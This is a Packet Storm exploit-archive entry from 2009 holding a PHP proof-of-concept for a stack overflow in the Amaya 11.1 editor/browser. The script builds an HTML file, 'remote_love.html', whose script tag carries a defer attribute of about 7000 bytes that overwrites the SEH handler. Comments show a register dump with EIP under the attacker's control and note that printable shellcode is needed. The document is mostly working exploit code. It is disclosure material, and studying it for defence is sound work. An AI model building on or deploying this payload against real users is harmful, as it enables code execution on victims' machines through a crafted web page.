Amaya 11.1 Stack Overflow

2009-03-30T00:00:00
ID PACKETSTORM:76166
Type packetstorm
Reporter Alfons Luja
Modified 2009-03-30T00:00:00

Description

                                        
                                            `<?php  
  
/**//*  
  
Amaya 11.1 W3C's editor/browser  
Stack Owerflow POC  
Discover by Alfons Luja   
Thx : OiN   
select * from friends --  
This stUff overwrite SEH in my box XP home sp 2   
To correctly overwrite seh you must upload "remote_love.html" to remote server   
Amaya allow only printable shellcode in this case   
  
EAX:00000000  
ECX:43434343  
EDX:7C9037D8  
EBX:00000000  
ESP:0012DDD0  
EBP:0012DDF0  
ESI:00000000  
EDI:00000000  
EIP:43434343  
  
  
*//**/   
  
$junk = "\x41";  
$n_seh = "\x42\x42\x42\x42"; //pointer to next seh  
$h_seh = "\x43\x43\x43\x43"; //seh handler  
  
for($i=1;$i<7000 - (4*19) - 10;$i++){ $junk.="\x41"; }  
  
$junk.=$n_seh;  
$junk.=$h_seh;  
$hello = "<script defer=\"".$junk."\">";  
  
$hnd = fopen("remote_love.html","w");  
  
if($hnd){  
  
fputs($hnd,$hello);  
fclose($hnd);  
echo"DONE !!\n";  
  
} else {  
  
echo"Kupa !!\n";  
  
}  
  
?>  
  
`